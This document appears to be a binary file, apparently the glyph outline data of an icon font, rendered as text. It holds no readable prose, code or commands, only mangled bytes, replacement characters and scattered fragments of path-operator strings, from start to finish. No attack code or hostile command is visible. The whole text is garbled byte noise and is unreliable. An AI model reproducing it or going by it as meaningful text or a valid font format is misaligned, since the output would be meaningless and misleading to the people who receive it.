��?t$p
?r#q�����*&-0b#
#F+VVE*�/$�]��..��..	��5%8GXgx�!"3!26=4&675#37>.6?>'&/6767>&7;767>.67676'&'#776?>56&?67>4&��
L�eH�Ծ*4�		
�%x	0_ 		!L%	
	�
�**W		7Q(
�87&�
�:W

~	
	:t

D"D		
ss��o�	'�	

G	'
		

�	
'


	

K

��#+3:BISk���54'&'&'%&?6?>75&7'#'636%2'6'67#"'632'&'>'&'>&/.756'5%&56'54676?6'%.=6'5&73767>=7>7%#5727� �@Z�/	�
d��' & )&��JD5�AK/&&!%!'!%].:''*i$'+��jy
	l�`&
G��%J�"
k�
�<��G!�[	��!
�("
�0		�
gN6#�(-K%*P
4


��P).
+$*K$(*HI	
K	--- �

#H��	
	<7


BC#)5 >~	a4959��u+Lix�������&'&'&+'#"35!2?4."#'&=&746;.#56'.+&#5&546722%76'6'&""76'6'&">4."2>4.74'&'.276767">4."2>4.74'&'.27676�"z5f
&)#�	�		6�"@��rp'+�N)'��++,,	1
1
�-,	1
1
�!


>5 2(�m$}8A'�|!��Xa&	
'
Z	UI
*-))+���	

		

,	


U56��8X		9
	�56��8X
	:		��*AJS\u�!2654&+"?>;2+76...54&;26=7676"&462"&462"&4627&'&#!"3!26756'&!"'.=467!36��!��
=B!
�
�$76$&�$&�$&$�f#2
�#1 �U �h7T�fe*4}2*
��
�*�&&&N/#0#
/"&b/  ����0=�%&'&'&'&"6/'&/&'&'&677'&'&6&'&2?>/&'.6676'&/.62>4'&/.6>/&4767626?64&/&7>76&/&'&466?>&/.6264/&'&4676'&/.6>4'&'&276?>&/.4&">Y����	=-��
*U	�
��	�y<,��@
�EF�
	
	
:/@U*��� A0T
	







YZ-X
)U*
�a	��<-�e
K
���{y=
,A��

FE�

	
	81	@T+
��2!@0
S


		


	ZY,Z+T*
	�
����IZn����"22?676767>#'.'&'&6?>/&/&/./&'76/.327"'&?6376#!"&7676?67>'&/&6372674?43767>7676?6237672?672'&'&7676767'&'&7>76'274'&&'&576376&/.75>?6'676&'&?$9L&	
'&)
9J1�(2�

yf��M:

	5A	

	,



�

	�
�
	
	i	�$	}
!?&"${
 	
��

,
0
		�!		

#i
V
	�	9!p		
������������4&'&#&76'54'&'&"6#!"&=&66'.+&'#"&56'4&2754>736276=463!266'&754>;6/"&547%32767676?6'&'&762&'&'.6>7>'4&"&4>6&'&&6�F:	
 
	�!

'


�	v	J	��*gF! &O+A?>A+<b?�@2O<+*>X_S6�&(7)(�+3&>XX@:Q	H
 	IJ		�
	""
	CY,/X�
�	8*

	f

a	!&iA$
$3O �##+++*��$< #8 l�)8()'hH&
%��#6Bhq%"264&"&462%"264&"&462%7>'&'.#";46%&'&/.+"+34>2326=4'&%532F&66L66&!p&66L66&!�%mKBHm3td"Y:�


^�
'�

��0:0M
��_"!�6L66L6�!!�6L66L6�!!�0�BL0O&-,MJ	'	+�
��+00T1$sD����[jw�����(3AP[gs�������065?65&/467676?6?67676'&'&/&74?6676'&'&'&/##23'&'&6&'&/#"&'&76'676?2&'&'&&'.'&76/&6?65&%.'&76?6?>'&'6&'&76&/&'&'&/&'&&#'.5767654;2>.#"64&"7"#&6=46=4.754&"626'54&7&676"'&6'4=4'"326&74&?6767>''6&6%.'.?6'&7676767>'"	OF
			42Q
&=e:!2D!	

�$		&)A,$=
1)

��["'!


!P�(&
	
&.!!	2757y	
-

<
5	�	�'	�	
	>#	�"
	
*6
	



!2$'+H/.
.'Tj'd"

$$
g
5	��	) 
B-		

(�	
	

	

i!4	
,E/00

1$7hE
G
8

	'	B	
6
 
;	�	
		��E\|���2372#'"'&36##"'"&=4676?676&*"&=436626'56&##"'"36"#'"'#"&=46762+"=4;2%#"/3767232'#&'&'0)Q(	@@			+V7

2

=�NN0bn8#E�




�! �L/.	'&
�
�&"	U+
w�* 
�n6

�
	
�TxS$"C
"	��pH��&'&'#"'&767676'&'./&676'7>767676&'&'&>7676?767>/&'&>>/&'&7>'&&>3d3�
e)
C8_p%		�	QD!
~6F%M%"0]�)	�o
P=�:	

o�H
@sB�+I)&
���^*	��OPnWml��7($3pU-B�.1E�u$		@�&.YV!&	2
	

09��iv���&/&/&'&'&>5'.'&376?6?653;2=4#'&54/473726%'"6?77#4&#""/"&76762766."'.763:65/4676767>'&67673>'&74&"'.?6;65/4
�	
)T'
3,-
4�Fhh��

				�"%	
	��



E	r�
-.�

8
 ��&	�_I#43�		��
&3*&0@/	�

	
!
;/����Ew�����%&/&'&'&4767>/&'&'&/&7%67613>&'37676'.'&7>'.'&7>766&'&#"3#"&'&676676&7>7>''"'&76'>&'.'&73>54'&"7016'.67>76=�66�


 	9&

	~%	E"f
�e*H.+uWN!5$''0)!'"	%'
66"<+
Q;#


&$B!(6:

=1.<";�	)'A
�			!# a

	

���
	z%�		 
�
;0G&=


$5",!	
/M��8Q
>$	
""1*3�

!(/15	7�		�	+
	*
���/C\j}�����"#"32323667&#"&?'#"#&?67%*"'"362'56&&#!"3!27676'&#.7663264&#!&33676?6&'#!"%45&74&+"73;62667'#";22;264&#!"6?#"362?#"{``	�s
G'H
6	��F�2:	��Ihh5��2��$-��*T���
�

��!t. ����
KDD�		���d
#"V-)	V�	C$D	�#�g-
�uu��t"	$)
!�
!
�	%

�,Z	
	�4)	���:Tn����.6;26767676'4.'.'&76?6?6"&54'&'.'&6?#'&?67676'4'&6362?67>.%?67>'&2376764&546?676..6?>.+76767>'4?6&.676767>.���


&
	|			*


�
�	h6	#
�K:
_�H��
�-
9r-8|
.X[$!B'
4�
C"
�A
	9*1#!%3-;
	
�
%
,O1*&20 
3	

�P


 
	

	�

1��Vfs�����������'4>IXft����������'3?KXdoy���7&5'&'&35463>763'&56454&#*"/&"#&"#";25.%!"3!2654&4>#."&54>32'2"&46"&4622"&546'2'1.5464632#".4632#".''&=4>#"&462'4>32#".#"&54>245>32&".4>32&'&=4676'7#"&4>732'462".71"&462".54>32'4>32#"&7"&5&63"&4632'462#".7"&4>'.54>27"&5&6"&54>2".54>32&>2''.7547672"&4>32'"&4>32'"&54>32'4>2"&7".'1&62#".46"&4632>32#&4632#"&5462#"&"&54>2'.5462"&54>27".54636'"&46727�;-p(!
&;�3N/>58%<
CA=Z

	2J"���I
- 

�!&!!!�M
	

!	d

-	.	
.		
!	O
	.!	-#


(		
.
	
+
	!




*

			
		
	%	
	

	"			
8

	

	

		!
%


		

	�49$$*&P7�-I-!#==BB[]
*B]-��4Q

3
	G"!R!3!t		
!
'	\
	
T!	1	
/
I	-			]
		)!D		�
	
O	
	J	�!
V	
,	!:
		k	
k		"	�		!;=	!:
	
9
T
2	

!~		i 

�

	Hz
!�!	�

N	

	 ����6e��&#"736326%&+&6?6?67#"&?6736767627>76?64'&'&''&'6762276?67&'6?6'&'&'3676���Ap
�cLN�Gt;C	~��U6?\}X	)!do15#.:;eBFh
b�,>LH
C/4=[eG1G	`�C
�W^h�l5	p*	
29K	"(4;9-%�;>
	0J#3
�:;	->*
��xR`p���
;6?67676754&&'5&/&'.'&'&?676'&#&&5'56&'"76?&'6?62/&'&6376763763&'&'.2656'4&+&=4&76676?676&/&'&'&'#&#"36766'6&#*"&#36;272656&%.>%"264&'4'54'&'&&'&'."36;65k
>�%	
G			

	
U


		�$$0�6

			4?.H

-!.$
)8
"$	'*:!?#	
6
#"�	
%�&		,X33��#,,X��H&\(
a5e#(d
X		2k	#

�'P#C* K,2T<
&+��	bh�
\[	�b�

c
z=&		1�	7
	"D�	��OAKZm�&'&'&#'"&'.;254/.=6767673636&%"&4636.'5&763247632#"&'&554."'&'./&767>3>@/

i%-'	'�&
68
	��
�
	
(
	�	�	i=
`
*	/
		

">}��&%	
	 N�U	
#
���	?
		~���
:>"!4.'4&'.'5#54&+"7>3535;265!!�$>$$>�
3X7`	�dP1O-h�T��s%>%��%>%���:gH
�f	*)B]4��`I�� |�74567>=4&/&5654?>36'547>##&#";76#&#"3272'&#";2.'&7%454765&74&'&'&5&?67>3272#&#";76'&#";276'&#";2'.'&7�7
H
A


AH
:  	//
	G	.*"D,F;


&	

; 

		!
	J	7A!!�<;D X	H
"D
<	j
j
<@G
-
	"K.R8$8,88I"HG	
	2d	=x4'	#L
				(!/6%5��+6?HQZm&'&'&'&'&+#"3>2354623''&''#532"264&"&462%"264&"&462%..3?>,"(�:
$8N7w<V<%=�6u�:/%44J55%*��#22F22#(����
�2.+=.:&�� - ' &66&+<<+�^�|"BKI5J55J5�,*}2F22F2�((�=��D��5-Nc{�'&'&'&'&7676'&?676'&?676766'&'&'&'&?>74'&'&7>&'&767676?>'&676'&654%J
@ 	
#(.0
	
	(?Bm7�� 	%
'	�k f�(#&E
+�	
�= 
	!0 
-(&
	
4Si0�(%

#
lk'	
$<_#��,7	
)+6,(#
$%��^j%&'&'&'&376?64&'&6767636'&'&'3&#"&/&767>'.67676?>X(�4>0I@(w��
	 +*
(' /
	"
"
2U	@!L
,'>N'weB JA(

,
	
.5��%U&/&76?676?6?67&'&#&'&'&6766767667676&
"		 		$�
%>e;>&K !H6%#< %
	
		
4'j?1`/#
	f2>\.Y('�7
)!&			**
���q~��.7546;6/&/7;2&'&'&+"'&+"&76'&'&63267>3626?67673'&'&?6".4>2'">4&"&>�
��D|hpF"	�
�&K**>��
2B"
+XA,��#;"";F;"";#,,=++WS�rWg�w<8Y-
4).

"
(

4Q16N
>!;F;##;E;"�,=,+>+n���5Ke����&'&'.##"'"3!26'762;6'&'&76&#!&%'#'";26'&76&'7>7'&/&7676&#&#"'";676'&'.'&'&'&'&'&>>%765'&'&632>76767'&'&�
		2d�^

�>VV�		��.|	�3+" $$:*	6)4B	-L
+	

x|.&!:&!.)!
7��	9 /%#(;� C
% (G$	<+$
l7&3*%\OESA�

D(5>5

��	 

� 

.4�
'0!)�	

	��M$9J`u�������%4&#!"3!6'%#"'&'&74;63#"'&'&7>3723#".74;23#"'&'&74637323"#5&7676;6362265&74&+"2".4>232#/".>'2".4>231".4>.#'"736'5&'5&626/3'4&##&67>'#">767>'+"676L
�q

�
��	
	e		!"]	D
]
f


�'�'��
#
	

Q
#	!
�O	�*(	#
g#!*�!
 )
�

��
�
		
	phhgg1#^	
#^
#
^

#1c�
5c|��،|��*%
,"
. .#	���(>Vk����(=g�%4&#/&/&#"326?67>5&%#&+'&'&6'&376"#&&=&767672763#"&'&7>327#"'.75>33237+".=>;2'&/&'&6?676>=476&?676>3236776767>7676&#&'&'&'.#"&"67>54'&=4&+"%03'"#"654&5#354"65&5'&6&'&#'7676767672?>4&'"'&'&'"'&&#"'&#&#"?63667676&A=Le3@!7�
B#B 9:=@�N��--]	
�4_	.	
z0


I�w��	�;2(o�
	��

	


'(�
	G
	�



	

R(
	
	
%�
3L5f#	

	


	�
"	
		�	
-

"
��	'-~�{��S�	X�G�"E
1/f

		
	+



	���4AN[hv���������$7Qew����%454&#'"'!"3$265<'4676362652".4>2".4>%4>2".4>2".".4>2".54>32'".54>32'".4>272".4>".54>2#".4>2".54>3246;2'#&5+&64&365+&&765&63674546;2#'&"&236#&"754'46"&#"'&'&54'4633646;23#"56#&"=&6372'"&#".=6&5>227665&7=&67>/76'&'&754&#&"632>54&#!"%2727>'>736'546&+"�	��
��		
		
DC
�4#
#��#
###?##
-




#
R#1#
#

#.

R>	
P:	
5!;
G'
!<;O

�Z	 	@�S�
	��	��			fOQ�	1B!
	��		B	
A

"
"
K$#/
"
=$=%
$
%P
#N"

"="
"
k
_
$4
$�	8�*m
%*! 

�$

�
?H		f�6	5kP	
^

�'
'�w
��J*<HYfx��4'5&56=4'5&'4&#&3 265%+"&56'46;65&676?+"&56'5&327&676?+"&=435327&6?6?67>'+&6Jgu@U+97I���+ml%IR
v:�kn@~dZ�k
656?^���
,
}
<G�%1

K  
�RE��
��*/D"
���$J95��5
�$7	
m
G$��x:JZjz��������
*:J^v��.'5476&+"'"1#"&6&#'"#"&56'53!265&74&+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;25+"&=46;2%>5'&'.##"6%2;66'&'.#'&&>6767'&/&>2
)S)
			()	�i
���KKKKKKeJJJJJJ�SSSSSSSSSS�DDDDDD^DDDDDD�.

$�
	�$
	)9 �%
#3	 
("'


7��	����CCC�CCC�"###�CCC�CCC�R~?
�'	��:>q�-
((*%&����(~����%&'&'&'&'&'&/.76767>276327676>'5&&'5&'.'&'&"'&57676'&+&#&/&''"%6?'2"&46''&'#.'&676'&3276?6767676&'"'&/&'&'&'&5476&�
". 6	
d�aC<"3&
o�Jf\f��	'`'"4I
	

	
g	

))
!58"A1 U"
\7U% 

_.=(#
yW+	
�
dC
	B&,+4&	7/>�
7'O<M0

/""�t9
B�
4;D`/	
2"O

��"+4>GVeo����5'&'&#";$6'%.>7.67&'>7.462'7676'&'#&&/&#"??&'&67>&'&'&'&2?67&/6?64/&6'&/&'&6~k3<H2xF�,��{!�$
>	

�o	$
	�1Z	�&0M>j4%/
	�$/#6Of\�3(�
(	t-"Dx!-Z8
j	9$#�

�	

	S� 
-X�o		K9x<+5	

	9 !"/ /�//�		"	$(#��yIM�7;2676'&7>;2656'5!%#'#&#'#&'5&#&##'#&/.#'#!7#!54&76&#/&"3$7>74?676/&/&'476&'&'&6767>565.wJ
		&&		F	
��	""*��)�,-@�u�S"%d�$#�c'!
"
i��87264368

�20 0/001ttp//z
&-&#+,"
$$,-"'
*M� aH$%& 9$���$:Nd����$456'55'.#'"363!265%&#"&=46;727#&"=6'4;72"&+"56'4;2.#"&''&'&6767''&"'&7>76&'&67>674636'&7>676364/&'&'&013#456725'#0##"/""3;6367675'264&"7.#"2>54".547>32}�KXX-g4.-
D�*
�%$�
+*
	9	�	+
S34+G
G%@E=0
0
,	<"'
CJ+,
E�#r	!	
	1h2(B#=F=#�6
;$-6X-�65�@!	��r		JT*
&	%$
+*
.	,$'
@!	

-?!
-!$%
U�		: 9	Ap,##=##=#1�6!)#)6���<i|���"#"#732;2?6?6&+"&?65&'&6?6?>'6?>4&#&#'&'.76767>'&'&.;26567>'&76764/.'&76764'&'&664&�no�I��	e	'J"���T�@	.\��	0)I864	�/<O?3%	`�HEB\ d�Kr�$(-2 B!'&�N)!-.!c)):(*��K	�	
$+Y(gpw	�*R�		2/�F�D'4t�GMr9N�1(��>924�P)15N/N);)(9*����/PY#"5&'&?+!"#"767676#&+"'&/&7>736"&462�?KL9*H���KKS7L�29@"RK�&%L&,*!!G3H32J2|J'~�".Nd'�tI,��;

�J)�C(
�%22I33
���<t�������"[6?67676656'4&&'&'&/&"&'&/&#"&'5.6765463767675&'6.7>'#"'&'&?46376'&#"&57'&'#.7676673/&'&&7>4/&6?6736&&'&'&6?62767>'&56'476762'&4&+"'.7676?66=4&"73265
1#)	t/;
$$�!$ #4
NF
G7M�4YhX34Z63T3{
w00$+:

y!1	
"

,S
[!6%
�w.*&	

$=	?:T?.*V'&	%

->>	.9	,5'�|))8'
@!%=

	
	0+



$G	'{6[43XiY22U�
,!�		�#/,&9)	�DE
9	,""/.*
.	4!"
!'�
@+
~	

''%P/*&��78Ac|���������������������	 $,5=G?2=&/&'."4&#'&?6?6'>4&"?676?67676=&'.767676'&'4'#'"722676&#&'"535#'535#&4/&735#014'&73#5350#535#535#5351#535#53#5351#535#535#535#535#573#535#5351#535#535#535#53#5735#535#56535#535#535#53#537#537#5737#573�			�y	�D
��


IL
p$$2$$�U	


%$	"�?_@ o7	6�
 %,,-,
	!%}"7I%
$H�6{
K�KV)0��	�#3$#4$��
	
'
	
#
 )		
k�uM�

	��#��!��#��#�1
:/!��nz&'.76'&'&67>'&'&72656'&'&'&'&7>3276?>'&'&'&'.7676&'.>�";
!$7	.	E`\�ADW,I>-*&
'�
p.%
I9
!Q9wi/Z6


��NA4+2,\6�

!-%"7
	3K3GIi0%
	3%0(�8
8r]t<
279"


6d2/X =D10#&��b&'&'.'&'&676'&'&/.>3676?>'&'&/&37676&� 3�T�LyV+H=RB
$3U�4#
D4	"1Inm2_FC!7*o/)24/,T3!
�G 3R�
/% 	00b>X"
8Wr7 
:<,	B
.O9���D\q4'&33676&'&'&67>767>'/&'&76?2��:01

	!



!	

.T,,!6c.	-<
2a%]I2
	
0tD�10	



xR,,!.`!B0:`*!
?*

t0
���Ufw'&/&'&'&'&76767>6?676'&767676767>76776?64&"767>.i
:	W
#/


	�I
)M.
gf		
		&

(		53	��-"C3
3D!`
3ef2 	8p#/"
'�K	?H
	fg		

&	35	
8��!D3
3C"n	2ef3��@T^�&'.73;2'&+""67>7676&'&'&3!>76'54&#!"&>&+#'&=;'&'3637'&7F�2e
	
!3	�M		 	�O��	

	�	�	 �)�Qjԣ$6�$
	
 3r.l00

l
	�!4�g�b�-C����Lf��'&'&'&'&76?6767>'5&7>74767>7>7>736'6767676'&'&'&665&67>/&'.+"'.#7636"#"7321'&'&'&+"#'&'&/&6;65&74&+"&7>323632676762'#'MlhX8	0		@82d	$FK;Uo>A��
$	2@Lww�d
4�		�
	
	[�O:
	�	=
QP4*:s"<*


dp�y
	
 

	��hJPTzl>P�v
,
	��3:	4"%

-	��GKT]&/&+"#54&'%&"&54&#"26=!";2>532>53265%53"&462!"&462���
%
��3"���

N2<2�2<21
�]a�� .  � .  j�
��N�
8�

��L
R
2322
��� -  -  -  - ����AXh%&#&'67672>'&'&'%&#'./.76?676>&.7>7>'&'67&'&'&
>&\"W 	C[
>��&
]E@K
G4-22VO'<-)

+
>��)R
	�	 �,4%Df*
	,CTl,&0+-J$OTt
)	
.�kj*������4c'&'&76765476'&?6'&7676?6766?6'&'&76?67>21�", 3J.
? */	=E$		��"3H
L%
���*	I� 	'm$
[F& *1'-$�I	0R9+
g�	,"��������&'&'&'#"&'&'&76'&'&'&"'&/.76?6'&/&#'"'&'&'&676?65&757676?6?>76&/&6'7!626674332/&?672767.�

	'	, �.%
WW	
		'
:#
	*)S6	"	�#
	6&J�!/I.0<	*
�T+14) "3		%K@_D?a(PH$%K8
T
!B+


.� �'#10G1����*3<Fi�������%&'.'.'&363276&&54627".632#&546%6?6676?6/.+"6&'&'&'&267676&'7264&"&'767674'&'&'&&'&/."?6&"3!26#!"'&475562�!!

	9q�	
	#		.		
	�r	

&

a+�
	H
!+X##VTZ78	�	%���Z��.+�,-A	�0	i hS99


'
!		
]	
7		�CP

$C36
� * -�		$'%i8	/��((�^&JJ

��_	��6H�������&/&'&'%&6'5645463?627>"+32>'.%"#".6&#".=4&#'"7366?636267>7636=&74&%"+'"&?63632">4&"&>%">&".>'2=4#&�
%��
2,#5#0�
��
2
���'
BA	�		@#�
	?>. #4

��"# 
N%77M56&b'44N44'
�D"�33(	-
.("
�	FU*
�	��

>#)

�	
�
/		;>	
# $1	b]W6L66K6{{4N54N4|z&%�%���)4�������*R%!"3!26=4&#64'3'3#64"&=4;%+64'32%654&"'&'&473>=46;2574&+"=46;2;26=4;254+"+"'&+";;2?63276;'&%4;2+"5'&?62'"/&4?6'&?62'"/&6?6'7>&'/&?6'7>&'76/&646+"5!";2+"3!2=4+"=4;26=4^��&)O� &OO�OO]$W--��	

�<�^���H
	PP

We�pp�"L*(":':".E*$I(0!���
i!J:&%4'{

)
++

�

	-pe�B�6�,%�p"
EEGR�_
.,YR))P(&GF' D)dA)D+\?)@���**��\~�����474>3!2+";2#";2+";2+";72#.65.+&"&=&&'&#&#.67>=4?>32'2326=4&#"3".4>3264&"".4>32'64&�
�


2
S
	��

.
I�
&1"	+?$,C !W0	

,
+==-�))c
�070/+<�$%�01+<0G$%s�J!



f"1
#6=,�]
(@{�!���r^�0/80=,%z0:0:./h%	�r7��ox��%&=.'&#'"72326'%&'&7676763;636'&'&=74376?>'.#"/&5>76&/&&'"5'&+"#/&/'#&#&3"372736?6;2?476723567>/4?636576'5"&>%&'&=?>/&"'.?>&/&/&5'.+"/#'#&#"3"?2737676;2?4?63767>/&?637257>#.>7&'#"&7326=4&+"&=4&+"+'&5'.+"676335&54>3226'<&+"&67;76;265&74'%##"&7>32"+"56&7>36�'#%	��"63i"

A4	,	

		






~"�
		
			oj
&'E #)�@4%� 8!
9
"�tF#
6	|*	4o+��*�('

	P+}







	
	#"	




�H5��

%~04
/=--
�5	F#	WJ	:������4&&'&/."'&#&#;2;26'&/6326'474'&'.+"'#'656767676"1776?65&46;2'#+&"&56&"#"#""'.#*3!2676'&� A;)�N


+0
<h��&zO"D�j	N	(** ��N0+�x`1	;��@�t
(T+
#;t
g#"
]/	<:@�>n
	*(/0,!	" O3��(�������x�:&+"&5'&547676&76#&#"'&56&'#&=467676'5.#!";76'&/&'&#"676&5>67>7676;2767>'&67>7>676276?#"&'4;6676&%""&7>7>3627"'"&5746;&76?6&'#&746'./&'./&'&'#"3676?676?>675&637>'&/&6?67654".>%.?676'""&=6'.&/&/&'&'#&73276?6>?>676'546;>'&/&6?676&'&'".>67>'5676'47675&;264&""'&'&&�5	
�d%I&.$	"�	
 	#!-

		 "(7
��/^

('�
%S
�
!				




�"11E22P
	


		
	
	�''8)(

�		#"		�


�
	 	

	
"!!V
+
qN9	
�

&7$��
#		
	
	
c2D22D3?	



		
	R'8((8("
���;?FPY_hmsy���6737#53!53!#/##>'&%3#'6?''&'6?'&#767''7'6&/7''&'#.'&#!"!>76!5!��Dh��	3��0	#'-�zz�<


..
<8

!38
	�
��!4'�H��%$z}��
	"#J�2H�$E�H$6/'4!�g$"++ 2#%4#;5*\	30!]&	�,/

99�`	6F(*3���8�����.@&'&'&'&'.'&/&#"76767>276327676>'5&#&'5&'.'&'."'&=676&+&&5''"76?&''&/.'&676&/&'./&'&'&=6/&'&76&/&"3>;3276>"'&7276?67676&'"'&/&'&'&'&576&4#'&2>'&�%0
>A
		

	!

 �[�d��
"U"!+	A			
[
�	$ +{	0�Iy>
1"B!V
e			����
Q1J!	
T)6�)	^�	!
 	
,/

	

	l5



X;_
> 

-"	o7p0!B;#!+�7F:�-J#

				
(9


$,4<U)	,F�i)6

�o$r~���*4@n%&'&'&'&/.76767>'&276327676>'5&&5&'.'&'."'&57676&+&"5&/#"776''&'1&'&76"#&37676?67676&'"'&/.'&'&576&&'&'&'&'&/&37676?6'&%23637626'54"&5&/&'.1"&576&#&"5'#&7&5''&'#&5&6"&37676767676&#""'&'&#.=4&�	'IDb@/&"
��D38K�X #
1
	F�!d%	1
=&	:
@(
�.B, 90,7��
*
	 	
0�$@!	)&
	
+
�R:


	E,-	 N?*V

	�3!	5B3'"#�	"(.@ 	!6	
�		9(	

	�	.
 0
#	9	9k.P2/n +	

%����4?MYhw&'.67$7>'&74;22?6767654&564"32654&%6?6'&3?6'.776?6'.'"#"&7676#, 1&XB L8
Le3GE�wP(
	��#"""x,

`	/%(a	 $
� '^�
/qM

!	Ql6 =8�a		
-��"0$#!�R
2WJ
:2�^"w��)9FJN&'#"32>54&''7'77%&#"32?!!276'"'&5>365'7�%1.$$.#;"8       �*5=JG&#8.,
��F�.6!EHCcz$$.+$";#.h   �~YS2"7("71�C#4" �Ӱ��]7]��)1>BF&'#"32>54&#53%&#"32?!!276'"'&5>365'7�%1.$$.#;"2vv�*5=JG&#8.,
��F�.6!EHCcz$$.+$";#.Y!�~YS2"7("71�C#4" �Ӱ��]7]��( :GKO.'#"32>54&##5#53533%&#"32?!!274'"'&5>365'7�-.$.";"0*%**%*�*5;LG&#8.-
��F�.8!EGBcz$.50";#.[**%**�~YU0"7%%41�D"4# �Ӱ��]7]��)&@MQU&'#"32>54&"/&4?676%&#"32?!!276'"'&5>365'7�%1.$$.#;"*O/!?~*5=JG&#8.,
��F�.6!EHCcz$$.+$";#.+N0!?�~YS2"7("71�C#4" �Ӱ��]7]���$(,&#"32?!!274'"'&5>365'7�*5<KG&#:,,�b��.7 
!EHCc�~YS2"7.%4]�C#5% �Ӱ��]7]��:!M\n%.'#"32>54&''7'77'&'.'676767654./5#"356767&54675&632+#/532,.#.";"8 b3	%I+b3#/4+<b# >0��$	)� 8�"/4":".g      �!!4@+aZ�_[_
3O/X$5��
'<��:EUg%.'#"32>54&#53'&'.'676767654./5#"356767&54675&632+#/532,.#.";"2tt�3	%I+b3#/4+<b# >0�� &	)� 8�"/4":".X!�!!4@+aZ�_[_
3O/X$5
��
'<��:!JZl%.'#"32>54&##5#53533'.'>54'./5#"356767&54675&632+#/532,.#.";"0)%**%)�-3(G-b3#/4+=a
" >0�� &	)� 8�$/3":".Z**%))�(&32" +aZ�_[_
3O/X$5
��
'<��:(Tdv%.'#"32>54&"/&?62762'&'.'676767654./5#"356767&54675&632+#/532,.#.";"*N/!>�3	%I+b3#/4+<b# >0�� &	)� 8�"/4":".*N0 >�!!4@+aZ�_[_
3O/X$5
��
'<���&:M.'&'>54'&'&/5#"3567>54632+#/532�-$ %+a3$.4+=a4M-��	
)� 8 )

'44 $aZ�^[_	,L?,[

�
�
'<��T KTb%.'#"32>54&''7'77'&'.'&'5>54.'&'5##5##3353356767&54632++532.,/$	$/#;#8     Y	'5B#?$S%SpoT$T
B��eF@<?p�)qvL"$�$/4$#;#/i       �-N>1C-	RNNN�2OOOT5T�./)1���9"��TCLZ%.'#"32>54&#53'&'.'&'5>54.'&'5##5##3353356767&54632++532.,/$	$/#;#2vv	'5B#?$S%SpoT$T
B��eF@<?p�)qvL"$�$/4$#;#/Z"�-N>1C-	SOOO�2OOOT5T�./)1���9"��TIR^%.'#"32>54&##5#53533'&'.'5>54.'&'5##5##3353356767&54632++532.,.%(3#;#0*%**%*�	
*5!5C$=%S%SppS%SB��eF@>=p�)8qvKF�$/41&#;#/]**&**�0O>1C-	SOOO�2OOOT6S�./(2���,9$��T&QZh%.'#"32>54&/&?6276'&'.'&'5>54.'&'5##5##3353356767&54632++532.,/$	$/#;#*O0!?�	'5B#?$S%SpoT$T
B��eF@<?p�)qvL"$�$/4$#;#/+O1!?�-N>1C-	SOOO�2OOOT5T�./)1���9"���*4A&'.'5>54'&'&'&'5##5##3353356?>54+532+532�
6!5C'S%SppS%S	0G.� <?pfEO*qvLF O=/$!	SOOO�2OOOT.P:!\/(2��>�-8"��5Xmy%46767&'&'&'&/&'&'&54676763267&'&'5##"&'356767&'&%&'#"32>54&''7'77
#%V

		
!*/�	+>
#"[F:&I'
 �#%1.$.#;"8       s!="

"
	39
Xa5#'.% (
# .,"
T`|#$.4";#.h       ��5Vjn%46767&'&'&'&/&'&'&54676763267&'&'5##"&'356767'&%&'#"32>54&#53
#%V

		
!*/�	+>
#4 [
F:&I'
  �##2.$	$.#;"1vvs!="

"
	39
Xa5#'.% (#
 .,"
T`|##/4$";#.Y"��5Wlx%46767&'&'&'&/&'.54676763267&'&'5##"'&'356767'&'&%.'#"32>5.##5#53533
"
" 9


!&-,"�	*? #4 [
F;%&")
#�#,/$#.";#/*%**%*s!=
	
	57	Xa5F2*8(#
--	
T`|$.,%";#/\**&))��6Uiz%46767&'&'&'&/.547>763267&'&'5##"&'356767&'&%&'#"32>54&/&4?676
$%V	"%	*/�	+>
#"[F:&I'
 �#
#2.$	$.#;"*N0!>s!=
"

"
39
Xa5#'.% (
# .,"
T`~##/4$";#.*O0 >���P&'./&'&'&54676763267&'&'5##"&'3567>54�7&9

		
!,,"�	*?
#4 [
F:&I'
  �1B##
	57	Xa5#'.% (#
 .,"
T`:P0-��= Nem%.'#"32>54&''7'77#5&/#3&'&#"327&54673654##"'&'.5467>32!5&47!-5'	&6#<#8       ?@	"��2.'#'?,*07(3*@�

)
c���'/5&#<#0k  !    �LL.�%$+01>_6
/O�
��4%6�+��=F]e%.'#"32>54&#53#5&/#3&'&#"327&54673654##"'&'.5467>32!5&47!-5'	&6#<#2xxe@	"��2.'#'?,*07(3*@�

)
c���'/5&#<#0["�LL.�%$+01>_6
/O�
��4%6�+��=Mem%.'#"32>54&##5#53533#5&/#3&'&#"327&54673654#"'&'.546767632!5&47!-5'&6#<#0+&**&+g@	"��3-(" ' !T07(3*@�
b���'/51&#<#0]++&**�LL.�#%*.3>_/O�
��4% 3���+��=%Qhp%.'#"32>54&/&?6276#5&/#3&'&#"32754673654#"'&'.546767632!5&47!-5'	&6#<#*P1!@q@	"��3-+>'?,*/8'3*@�

c���'/5&#<#0,P1!@vLL.�F+01>_6

/O�
��4% 3�+���'>I#5&/#3&/"327673654#"&'&'&546767632!!564'�@	"��!2.,<!'>-(1A'%/@�
/	


+��N�LL#�B[4BZ7
H
��%6

�W���Y%&'#"32>54&''7'77!!!#327#".'&'#73'7#73676767632&'&#"�#0-"
	"-!9!6�Z2+��(�&�")$+:a�d
z&Lq*S
03FIZ0412	"$/l�!"-1"!9!-e�&8T U�6)
>pM%U T"O79 #,���Q%&'#"32>54&#53!!!#327#".'&'#73'7#73676767632&'&#"�#0-"
	"-!9!0qq�62+��(�&�")$+:a�d
z&Lq*S
03FIZ0412	"$/l�!"-1"!9!-V �&8T U�6)
>pM%U T"O79 #,���Z%&'#"32>56&##5#53533!!!#327#"&'&'&'#73547#736767>32&'&#"�#01&%2!8!.($(($(�2
1+��(�&� '%-8a�20
y&Kq*R13�\6-03$")l�!$-3-#!8!-X(($((�%8T T�7(		>86N%TT!K:9>%$

����$_%&'#"32>54&/&?6276!!!#327#".'&'#73'47#73676767632&'&#"�!1-"#-!9!(K-<�(0+��(�&� ''.6a�`
y&Kq*R
.5CIY9U8"$*l�!"-1#!9!-)K.<�";T
T�1%>mN%TT"Q4; 
%8%��f;%&'#"'37!547!7!676326767&'&#"#3#332767'&W
$'!+�'�*��-��<q+!/7081_�gV,vN)�
35�f<-/@'
�XX=%J)'BuR$X0X*Q9<?,��:=%&'#"32>54&''7'773#3##"'5#53!%2/#	#/#;"8   ����q(M3"1cc��%#/5$#;#.h       =�$!##�-<
